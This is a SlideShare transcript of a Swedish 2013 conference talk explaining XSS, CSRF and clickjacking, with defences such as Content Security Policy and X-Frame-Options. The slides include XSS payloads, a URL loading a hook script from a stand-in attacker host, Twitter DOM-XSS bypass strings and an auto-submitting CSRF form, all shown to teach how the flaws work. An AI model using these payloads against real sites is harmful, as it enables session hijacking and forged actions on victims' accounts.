Tre sårbarheter i webbappar

892 views

Published on

Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockhom, January 2013.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
892
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
5
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Tre sårbarheter i webbappar

  1. 1. Tre sårbarheter i webappar @johnwilander, GeekMeet 2013
  2. 2. Alla demos finns i FOSS-projektethttp://1-liner.org
  3. 3. Tre sårbarheter i webbappar• Cross-Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)• Clickjacking
  4. 4. Över 50 % är XSSKälla: IBM X-Force 2012 Mid-year Trend and Risk Report September 2012
  5. 5. Cross-Site Scripting Teori Scripting s-Site C ros
  6. 6. Cross-Site Scripting Typ 1, reflekterad Scripting Cross-Site Ph ish ing
  7. 7. Cross-Site Scripting Typ 2, lagrad s-S ite C ros
  8. 8. Cross-Site Scripting Typ 2, lagrad Scripting
  9. 9. Cross-Site Scripting Typ 0, DOM-baserad ng i pti Scr Cros s-Sit e Ph ish in g
  10. 10. Cross-Site Scripting Type 0, DOM-baserad ng i pti Scr Cros Inget anrop till servern! s-Sit e Single-page-appar gör att injicerade skript ”hänger Ph isini DOM:en. kvar” g
  11. 11. https://secure.example.com/authentication#language=sv&country=SE
  12. 12. https://secure.example.com/authentication#language=sv&country=SE Skickas aldrig till servern Var alltid försiktig med att använda data från URL:en, särskilt efter #.
  13. 13. Skulle du klicka på … https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/ hook.js"></script>&country=SE
  14. 14. Skulle du klicka på …https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F %2Fattackr.se%3A3000%2Fhook.js%22%3E%3C %2Fscript%3E&country=SE
  15. 15. Skulle du klicka på … http://bit.ly/Yg4T32
  16. 16. Filtrera bort <script>?var ... , stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,/** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, "");}, http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
  17. 17. Filtrera bort <script>?<img src=1 onerror=alert(1)><svg onload="javascript:alert(1)"xmlns="http://www.w3.org/2000/svg"></svg><body onload=alert(XSS)><table background="javascript:alert(XSS)">¼script¾alert(¢XSS¢)¼/script¾<video poster=javascript:alert(1)//
  18. 18. ”Kom igen, sånt där funkar inte, va?” Jo. Demo.
  19. 19. DOM-baserad XSS Twitter september 2010Källa:http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
  20. 20. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
  21. 21. Vad gör den här koden?(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
  22. 22. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
  23. 23. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => behåller domänen men initialt g.location = a; ändrar path }})(window);
  24. 24. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => behåller domänen men initialt g.location = a; ändrar path } Så})(window); twitter.com/#!/johnwilander blir twitter.com/johnwilander Read more: http://kotowicz.net/absolute/
  25. 25. http://twitter.com/#!javascript:alert(document.domain);
  26. 26. http://twitter.com/#!javascript:alert(document.domain); Skickas aldrig till servern => DOM-baserad XSS
  27. 27. The Patch™var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
  28. 28. The Patch™var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;} Ersätter första träffen för sökkriteriet
  29. 29. http://twitter.com/#!javascript::alert(document.domain);
  30. 30. http://twitter.com/#!javascript::alert(document.domain);
  31. 31. The 2nd Patch™(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
  32. 32. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare
  33. 33. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare Global matchning
  34. 34. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare Ignorera Global stor/liten matchning bokstav
  35. 35. Fääärdig?
  36. 36. http://twitter.com#!javascript&x58;alert(1)
  37. 37. http://twitter.com#!javascript&x58;alert(1) HTML entity för ’:’
  38. 38. The n:th Patch™ (den här funkar)(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window); Notera att Twitter faktiskt gör rätt: https://twitter.com/about/security
  39. 39. Lös sådana här problem på rätt sätt med Client-Side Encoding
  40. 40. https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>• $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style()• $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html()• $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes• $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc• $.encoder.encodeForURL() Encodes for safe usage in href etc
  41. 41. https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>• $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style()• $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html()• $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes• $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc• $.encoder.encodeForURL() Encodes for safe usage in href etc
  42. 42. En riktigt läbbig en:http://www.aol.com/
  43. 43. Skydd mot XSSContent Security Policy http://www.w3.org/TR/CSP/
  44. 44. Ny HTTP svars-header som säger ...Tillåt bara skript från godkända domänerochtillåt bara skript från filer, dvs inga inline-skript
  45. 45. self = samma URL, protokoll och portContent-Security-Policy: default-src selfLadda bara skript, plugins, css, bilder, ljud/video, frames, typsnitt ochdata från den egna domänenContent-Security-Policy: default-src self;img-src *; script-src trusted.comAcceptera bilder från valfri domän, skript från trusted.com,resterande bara från den egna domänen
  46. 46. CSRFmin favorit!
  47. 47. Cross-Site Request Forgery Request For gery Cro ss-S ite
  48. 48. Cross-Site Request Forgery Request Forgery Cros s-Site Ph ish ing
  49. 49. Får www.attackr.se ladda bilder så här: <img src=”https://secure.example.com/ logo.png" /> ?
  50. 50. Får www.attackr.se ladda bilder så här: <img src=”https://secure.example.com/authentication#language=sv&country=SE" /> ?
  51. 51. Med img-element så kan www.attackr.se tyst skicka HTTP GET till valfri domän <img src=”https://secure.example.com/ authentication#language=sv&country=SE" height=0 width=0 />
  52. 52. ”Hur är det med HTTP POST då?”
  53. 53. What’s on your mind? What’s on your mind? POST POST
  54. 54. What’s on your mind? What’s on your mind?I love OWASP! POST POST
  55. 55. What’s on your mind? What’s on your mind?I love OWASP! POST POSTJohn: I love OWASP!
  56. 56. What’s on your mind? What’s on your mind? POST POST
  57. 57. What’s on your mind? What’s on your mind? POST I hate OWASP! POST
  58. 58. What’s on your mind? What’s on your mind? POST I hate OWASP! POST
  59. 59. What’s on your mind? What’s on your mind? POST I hate OWASP! POSTJohn: I hate OWASP!
  60. 60. What’s on your mind? Look at the lol cat! POST <form id="target" method="POST" action="https://1-liner.org/form">John: I hate OWASP! <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/> </form> <script type="text/javascript"> $(document).ready(function() { $(#form).submit(); }); </script>
  61. 61. <form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit"What’s on your mind? What’s on your mind? value="POST"/> POST </form>John: I hate OWASP! <script> $(document).ready(function() { $(#target).submit(); }); </script>
  62. 62. csrfMulti.html invisible iframe csrfMulti0.html
  63. 63. csrfMulti.html invisible invisible iframe iframe target0.html csrfMulti1.html Wait
  64. 64. csrfMulti.html invisible invisible invisible iframe iframe iframe target0.html target1.html csrfMulti2.html Wait
  65. 65. csrfMulti.html invisible invisible invisible invisible iframe iframe iframe iframe target0.html target1.html target2.html csrfMulti3.html Wait
  66. 66. csrfMulti.html invisible invisible invisible invisible iframe iframe iframe iframe target0.html target1.html target2.html target3.html
  67. 67. Demo POST CSRF mot REST/json
  68. 68. Clickjacking... eller Likejacking eller Followjacking eller ...
  69. 69. Clickjacking-demo
  70. 70. X-Frame-Optionshttp://blogs.msdn.com/b/ie/archive/ 2009/01/27/ie8-security-part-vii- clickjacking-defenses.aspx http://tools.ietf.org/html/draft- gondrom-frame-options-01
  71. 71. Ingen sida får ladda mig i en iframeellerbara sidor på min egen domän fårladda mig i en iframe
  72. 72. X-Frame-Options: DENYX-Frame-Options: SAMEORIGIN(På gång:X-Frame-Options: ALLOW-FROM [list])
  73. 73. Intresserad?• Gå med i ditt lokala OWASP-chapter https://www.owasp.org/index.php/OWASP_Chapter• Börja följa de @0x6D6172696F @garethheyes @WisecWisec här personerna på Twitter: @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell• Börja hacka själv – det är kul! Bästa stället att börja? Dina sajter såklart. Håll det lagligt bara ;)

×